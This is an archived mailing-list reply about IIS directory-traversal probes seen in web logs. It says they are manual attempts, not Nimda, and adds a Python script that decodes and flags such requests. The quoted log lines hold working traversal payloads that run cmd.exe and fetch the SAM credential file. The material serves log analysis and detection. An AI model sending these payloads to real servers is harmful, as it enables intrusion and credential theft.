At 6/11/2002 01:03 PM, Tina Bird wrote:

>Here's what I'm seeing -- anyone have any information on this variant?
>
>Jun 10 12:53:37.845 <information deleted> op=GET arg=http://Target IP/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\\*.cif/s/b result="500 Server Error"
>
>Jun 10 12:53:39.675 <information deleted> op=GET arg=http://Target IP/a.asp/..%c1%1c../..%c1%1c../winnt/repair/sam result="404 Object Not Found"
>
>Jun 10 12:53:43.578 <information deleted> op=GET arg=http://Target IP/a.asp/..%c1%9c../..%c1%9c../winnt/repair/sam result="404 Object Not Found"

This is definitely not Nimda, although it attempts to exploit the same directory traversal vulnerability in IIS as Nimda (http://www.microsoft.com/technet/security/bulletin/ms00-078.asp). In fact, if these are the timestamps and there are no other logs, it appears that this attack is being manually performed.

What makes you think that this is a variant of Nimda?

Michael Katz
mikeat_private
Procinct Security

---------------------------------------------------------------------
To unsubscribe, e-mail: loganalysis-unsubscribeat_private
For additional commands, e-mail: loganalysis-helpat_private
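The three requests quoted above only make sense once the path is decoded the way the vulnerable IIS decoder did it: `%255c` is a double-encoded backslash, and `%c1%1c` / `%c1%9c` are malformed two-byte "UTF-8" sequences that the lenient decoder collapsed to a backslash. The script below is an added example (not code from the original post or from either poster): it reproduces both decoding quirks, runs them over constructed log lines in the same layout as the quoted ones (the IP address and the final benign request are made up), and flags any request whose decoded path climbs out of the web root or names a sensitive target.

```python
"""Flag IIS-style directory-traversal probes in web-server log lines.

Added example, not code from the original post. It models the two
decoding quirks the quoted probes rely on:
  * double percent-decoding:        %255c -> %5c -> '\\'
  * lenient 2-byte "UTF-8" decode:  %c1%1c, %c1%9c -> '\\'   (%c0%af -> '/')
and then checks whether the decoded path escapes the web root.
"""
import re
from urllib.parse import urlsplit

# Constructed log lines in the layout of the quoted ones (IP address is
# made up). The last line is a benign request included as a control.
SAMPLE_LOG = """\
Jun 10 12:53:37.845 op=GET arg=http://192.0.2.10/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\\*.cif/s/b result="500 Server Error"
Jun 10 12:53:39.675 op=GET arg=http://192.0.2.10/a.asp/..%c1%1c../..%c1%1c../winnt/repair/sam result="404 Object Not Found"
Jun 10 12:53:43.578 op=GET arg=http://192.0.2.10/a.asp/..%c1%9c../..%c1%9c../winnt/repair/sam result="404 Object Not Found"
Jun 10 12:55:01.002 op=GET arg=http://192.0.2.10/products/list.asp?id=42 result="200 OK"
"""

# Timestamp, then anything (the quoted lines had redacted fields here),
# then the op/arg/result fields.
LINE_RE = re.compile(
    r'^(?P<ts>\w{3} \d+ [\d:.]+) .*?op=(?P<op>\S+) arg=(?P<arg>\S+) '
    r'result="(?P<result>[^"]*)"'
)
PCT_RE = re.compile(rb"%([0-9A-Fa-f]{2})")

# Substrings (lower-cased) that should never appear in a legitimate path.
SENSITIVE = ("cmd.exe", "/winnt/repair/sam", "/winnt/system32/")


def percent_decode(data: bytes) -> bytes:
    """One pass of %XX decoding; malformed escapes are left untouched."""
    return PCT_RE.sub(lambda m: bytes([int(m.group(1), 16)]), data)


def lenient_utf8_decode(data: bytes) -> str:
    """Model of the permissive decoder behind MS00-078: a lead byte in
    0xC0-0xDF plus the following byte is combined into one character
    without checking that the second byte is a valid continuation byte
    or that the result is the shortest encoding. 0xC1 0x1C and 0xC1 0x9C
    both yield (1<<6)|0x1C == 92 == '\\'."""
    out, i = [], 0
    while i < len(data):
        b = data[i]
        if 0xC0 <= b <= 0xDF and i + 1 < len(data):
            out.append(chr(((b & 0x1F) << 6) | (data[i + 1] & 0x3F)))
            i += 2
        else:
            out.append(chr(b))
            i += 1
    return "".join(out)


def canonical_path(raw_path: str) -> str:
    """Decode the path as the vulnerable server would, normalising '\\' to '/'."""
    data = raw_path.encode("latin-1")
    data = percent_decode(data)
    data = percent_decode(data)   # second pass: double encoding (%255c)
    return lenient_utf8_decode(data).replace("\\", "/")


def escapes_root(path: str) -> bool:
    """True if '..' segments ever take the path above the web root."""
    depth = 0
    for seg in path.split("/"):
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        elif seg not in ("", "."):
            depth += 1
    return False


def scan_line(line: str):
    """Return a finding dict for a suspicious request, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    raw_path = urlsplit(m["arg"]).path      # query string is not part of the path
    path = canonical_path(raw_path)
    reasons = []
    if escapes_root(path):
        reasons.append("escapes web root")
    hits = [t for t in SENSITIVE if t in path.lower()]
    if hits:
        reasons.append("targets " + ", ".join(hits))
    if not reasons:
        return None
    return {"time": m["ts"], "raw": raw_path, "decoded": path,
            "status": m["result"], "reasons": reasons}


def scan_log(text: str) -> list:
    return [r for r in (scan_line(l) for l in text.splitlines()) if r]


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["time"], f["status"], "|", f["decoded"], "|", "; ".join(f["reasons"]))
```

Note that a 404 or 500 in the log does not mean the probe was harmless; the decision to alert is made on the decoded path, not on the status, because the same request against an unpatched host would have succeeded. The decode-then-check order is also the point of the fix: authorisation has to run on the canonical path, not on the raw request string.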
This archive was generated by hypermail 2b30 : Tue Jun 11 2002 - 16:43:33 PDT